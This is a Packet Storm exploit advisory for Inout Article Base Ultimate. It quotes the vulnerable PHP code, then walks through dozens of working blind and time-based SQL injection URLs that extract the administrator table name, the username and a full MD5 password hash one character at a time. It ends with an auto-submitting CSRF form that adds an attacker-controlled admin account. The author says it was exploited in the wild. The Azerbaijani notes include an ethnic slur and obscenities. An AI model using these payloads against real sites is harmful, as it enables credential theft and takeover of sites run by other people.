Inout Article Base Ultimate SQL Injection / CSRF

2012-10-25T00:00:00
ID PACKETSTORM:117656
Type packetstorm
Reporter Akastep
Modified 2012-10-25T00:00:00

Description

                                        
                                            `  
==============================================================================  
Vulnerable Software: Inout Article Base Ultimate Version: < 2  
Vulnerabilities: Blind SQLi && CROSS Site Request Forgery.  
Discovered and Exploited in Wild  
Vendor: inoutscripts.com  
==============================================================================  
  
  
About software version:  
==============================================================================  
I can't say what exact version affected but:(it is probably version < 2.0))  
Here is what it's Upgrade.html says:  
*Inout ArticleBase-Upgradtion to version 2.0*  
If you are currently using old version of Inout ArticleBase and want to upgrade  
to version 2.0 of Inout ArticleBase, please follow the instructions given below.  
etc...  
==============================================================================  
  
  
=========================VULNERABLE CODE=======================================  
//controller/ViewController.class.php  
  
function getarticlecount($cid)  
{  
$cat= $this->getSubcategoryList($cid);  
  
$this->loadLibrary("settings");  
$set=new settings("nesote_inoutarticle_settings");  
$set->loadValues();  
$show_articles=$set->getValue("show_ articles_selected_language");  
$lang_id=$this->getlang_id();  
if($show_articles==1)  
$languagecondition="and lang_id='".$lang_id."'";  
else  
$languagecondition="";  
  
//echo $parent;  
$db= new NesoteDALController();  
if($cat!=null)  
{  
$len=strlen($cat);  
$cat=substr($cat,0,($len-2));  
}  
else  
$cat="'".$cid."'";  
$total=$db->total(array("c"=>"nesote_inoutarticle_categories","a"=>"nesote_inoutarticle_articles"),"a.cid=c.id and a.cid in($cat) and a.status=? and c.status=? $languagecondition",array(1,1));  
// echo $db->getQuery();  
return $total;  
  
}  
  
===============================================================================  
  
================================EXPLOITATION===================================  
  
On TRUE returns: normal page to articles.  
On FALSE returns: No article posted yet.  
  
  
//TRUE verir bu.  
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)='1',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(length(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='i',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='e',benchmark(10000000,md5(1)),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if('a'='ab',1,0))-- and 8=('8  
  
TRUE DA xeberlerli sehife  
  
  
false-de  
  
No article posted yet.  
  
AND logical ile.  
  
  
  
password adli column burda olmalidir:  
  
  
//TRUE  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
1-CI SIMVOL c  
2-ci simvol: l  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,2,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
3-de: a  
  
  
www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,3,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
4-de s  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,4,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
5-de: s  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,5,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
6-da i  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,6,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
7-de f  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,7,1)='f',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
8-de i  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,8,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
9-da e  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,9,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
10-da d  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,10,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
11-de s  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,11,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
12-de _  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,12,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
hal hazirda classifieds_  
  
  
13-de: n  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,13,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
classifieds_n  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(table_name)='46',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
46 simvol! Burda deyiblere anovu sikim ermeni!!!!!!!!!!!  
  
  
Sikdirdi bu table baxaq basqasina.  
  
  
  
======================================================  
  
24-e qeder cixmir  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(table_name)!='0',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 25)-- and 8=('8  
  
  
14-cu simvol: e  
  
  
  
15-ci simvol: s  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,15,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
  
16-ci simvol: o  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,16,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
  
  
17-ci simvol: t  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,17,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
18-ci simvol: e  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,18,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
  
davamini gedek gorek ne verir.  
  
  
19-da _ olmalidir yoxlayaq yene de.  
  
  
  
duzdur  
  
  
19-cu simvol: _  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,19,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
20-ci simvol: i  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,20,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
21-ci simvol: n  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,21,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
22-ci simvol: o  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,22,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
23-cu simvol: u  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,23,1)='u',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
24-cu simvol: t  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,24,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
  
25-ci simvol: a  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,25,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
26-ci simvol: r  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,26,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
27-ci simvol: t  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,27,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
28-ci simvol: i  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,28,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
29-cu simvol: c  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,29,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
30-cu simvol: l  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,30,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
31-ci simvol: e  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,31,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
32-ci simvol: _  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,32,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
33-cu simvol: a  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,33,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
34-cu simvol: d  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,34,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
deyesen adminlikdir burda duz cixiriq ustune artiq.  
  
  
35-ci simvol: m  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,35,1)='m',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
36-ci simvol: i  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,36,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
37-ci simvol: n  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,37,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
38-ci simvol: i  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,38,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
39-cu simvol: s  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,39,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
40-ci simvol: t  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,40,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
41-ci simvol: r  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,41,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
42-ci simvol: a  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,42,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
43-cu simvol: t  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,43,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
44-cu simvol: o  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,44,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
45-ci simvol: r  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,45,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
46-ci simvol: s  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
Bu axirinci simvol idi cunki TRUE qaytardi yoxlanis:  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,100)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
table_name-i yigaq.  
  
  
  
  
  
  
mysql> select length('classifieds_nesote_inoutarticle_administrators') \g  
----------------------------------------------------------  
| length('classifieds_nesote_inoutarticle_administrators') |  
----------------------------------------------------------  
| 46 |  
----------------------------------------------------------  
1 row in set (0.00 sec)  
  
mysql>  
  
  
  
//TRUE  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,100)='classifieds_nesote_inoutarticle_administrators',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8  
  
  
  
  
  
  
burda bizde username  
id  
password columnlari var.  
  
  
Oxay bavan qurban 1 username var burda 100% adminlikdir)))))))  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(username)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC)-- and 8=('8  
  
  
  
  
//TRUE  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(username,1,10)='admin',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
  
menasiz idi amma yene de 100 olcek bir bicek  
  
//TRUE  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(username)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
  
MD5-dir pass:  
  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(password)='32',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
Cekek getsin naxuy:  
  
========================================================  
qancigin parolunun md5-i nin 1ci simvolu:  
1-ci simvol: f  
  
//TRUE  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,1,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
2-ci simvol: 8  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,2,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
3-cu simvol: c  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,3,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
4-cu simvol: b  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,4,1)='b',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
5-ci simvol: e  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,5,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
6-ci simvol: 6  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,6,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
7-ci simvol: 3  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,7,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
8-ci simvol: 7  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,8,1)='7',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
9-cu simvol: 1  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,9,1)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
10-cu simvol: 6  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,10,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
11-ci simvol: 4  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,11,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
12-ci simvol: 2  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,12,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
13-cu simvol: 5  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,13,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
14-cu simvol: 4  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,14,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
15-ci simvol: 4  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,15,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
16-ci simvol: 6  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,16,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
17-ci simvol: 2  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,17,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
18-ci simvol: 9  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,18,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
19-ci simvol: 5  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,19,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
20-ci simvol: 2  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,20,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
21-ci simvol: f  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,21,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
========================================================  
  
22-ci simvol: d  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,22,1)='d',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
========================================================  
23-cu simvol: a  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,23,1)='a',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
24-cu simvol: 4  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,24,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
25-ci simvol: c  
  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,25,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
  
26-ci simvol: e  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,26,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
========================================================  
  
27-ci simvol: 2  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,27,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
28-ci simvol: 3  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,28,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
  
========================================================  
  
29-cu simvol: 9  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,29,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
30-cu simvol: 8  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,30,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
31-ci simvol: e  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,31,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
========================================================  
32-ci simvol: 0  
  
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,32,1)='0',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8  
  
  
========================================================  
  
  
  
  
  
  
CSRF add admin:  
  
username: blackhatz  
password: blackhatz  
email: blackhatz@blackhatz.tld  
  
<body onload="javascript:document.forms[0].submit()">  
<form name="addsubadmin" id="addsubadmin" enctype="multipart/form-data" method="POST" action="http://www.xxxxxxxxxxxx.tld/admin/permissions/addsubadminprocess">  
<input name="username" type="text" id="username" value="blackhatz">  
<input name="name" type="text" id="name" value="blackhatz">  
<input name="password" type="password" id="password" value="blackhatz">  
<input name="cpassword" type="password" id="cpassword" value="blackhatz">  
<input name="email" type="text" id="email" value="blackhatz@blackhatz.tld">  
<select name="gid" id="gid" >  
<option value="1"></option>  
<option value="1">admins selected="selected"</option>  
</select>  
<input name="pid" type="hidden" id="pid" value="{$pid}">  
<!-- <input type="submit" name="Submit" value="Submit">-->  
</form>  
  
================ THE END =====================  
  
  
  
  
  
  
================================================  
  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
osvdb.com  
websecurity.com.ua  
  
to all Aa Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3 *  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
  
`